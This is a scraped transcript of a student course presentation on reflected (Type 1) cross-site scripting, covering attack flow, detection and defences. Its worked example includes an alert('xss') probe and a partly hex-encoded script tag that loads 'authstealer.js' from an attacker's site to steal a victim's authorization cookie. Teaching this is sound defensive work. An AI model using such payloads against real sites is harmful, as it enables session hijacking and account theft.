Presentation is loading. Please wait.

Presentation is loading. Please wait.

CSCE 548 Student Presentation Ryan Labrador

Published byGeoffrey Morgan Modified over 6 years ago

Similar presentations

Presentation on theme: "CSCE 548 Student Presentation Ryan Labrador"— Presentation transcript:

1 CSCE 548 Student Presentation Ryan Labrador
XSS (Type 1) CSCE 548 Student Presentation Ryan Labrador

2 Technical Overview Reflected XSS Non-Persistent XSS
Most frequent type of XSS1 A simple XSS attack involves three parties: the website, the victim and the attacker. The Type 1 XSS vulnerability is also known as Reflected XSS because of how the user input is immediately returned (or reflected) back to the user by the web application in some form of response (e.g. error message, search result). Type 1 XSS is also known as Non-persistent XSS because the injected attack is not saved on the server or within web application. 1

3 Technical Overview The attacker finds a vulnerable website.
The attacker crafts a malicious URL exploiting the vulnerability. Through social engineering, the attacker convinces the victim to click the malicious URL. The website sends invalidated input sent through the request back to the victim. The malicious code is executed using the victim’s browser. Websites vulnerable to Type 1 XSS attacks, like previously stated, return the user input without it being made safe to render in the browser.

4 Technical Overview The key to pulling off a successful XSS attack:
Social engineering Making the link look safe ;</script> vs. Social engineering: convincing someone to click the link is the hardest part. To accomplish this, the attacker can either make the link appear harmless keeping the same familiar name or by covering up the URL completely using a shorthand URL creation service (like tinyURL or Google)

5 Example3 Three actors: Bob, Alice, and Mallory.
Bob hosts a website that sells goods. Alice has an account on Bob’s website and buys from there frequently. When Alice is logged in, her browser keeps an Authorization Cookie so both her (the client) and the server remember she’s logged in. 3

6 Example3 Mallory discovers that Bob’s website has a XSS (type 1) vulnerability. While using the search page, she searches for puppies. Since Bob’s site doesn’t sell puppies, the following page displays “puppies not found.” The URL looks like: This is normal behavior. 3

7 Example3 Mallory uses a script for a search term to confirm her findings. <scripttype='text/javascript'>alert('xss');</script> This results in a page that displays: “<scripttype='text/javascript'>alert('xss');</script> not found” as well as an alert box that says “xss.” The URL is: This is exploitable behavior. 3

8 Example3 Mallory makes a URL to exploit the vulnerability: m/authstealer.js"></script> In order to better hide the script, Mallory converts the ASCII characters into hexadecimal format: rysevilsite.com%2Fauthstealer.js%22%3E She sends an to members of Bob’s site, saying “Check out some cute puppies!” 3

9 Example3 Alice gets the . Alice loves puppies, so she clicks on the link. The link takes her to Bob’s site and searches for puppies. Since the search comes up empty, it displays “puppies not found” while the script tag runs quietly in the background. Mallory’s script loads and runs a program authstealer.js. Authstealer.js takes a copy of Alice’s Authorization Cookie and now Mallory can log in appearing to be Alice! 3

10 Detection Methods (Overview)
The simplest way to test for XSS vulnerabilities (given by the book) is to make a request using malicious code for all the possible input parameters.2 If any data you entered gets returned in the raw HTML byte stream, you may have XSS issues in your code. 2 24 Deadly Sins of Software Security

11 Detection Methods (In-depth)
Black Box Testing1 Detect input vectors. Analyze each input vector to detect potential vulnerabilities. Analyze the result and determine if the vulnerability has a realistic impact on the web application’s security. OWASP.org has a three phase black-box test that will help detect common XSS (type 1) vulnerabilities. E.g., HTTP parameters, POST data, hidden form field values, predefined radio or selection values. Adding harmless input data to trigger responses alerting the tester of a possible vulnerability. Any test input found in the returning webpage should have all special characters properly encoded, replaced, or filtered out. 1

12 Avoidance of Error Server vs. Client Server Client
Sanitize search input (whitelist/blacklist) Redirect invalid requests Client Be aware of what you’re doing and what you’re clicking on HTML sanitization: the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated "safe" and desired.

13 References INPVAL-001) 24 Deadly Sins of Software Security

Download ppt "CSCE 548 Student Presentation Ryan Labrador"

Similar presentations

PHP Form and File Handling

PHP Form and File Handling
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.

Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.
WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?

WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Using KompoZer -- a web editor A collection of video tutorials

Using KompoZer -- a web editor A collection of video tutorials
JavaScript Forms Form Validation Cookies CGI Programs.

JavaScript Forms Form Validation Cookies CGI Programs.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Similar presentations

Ads by Google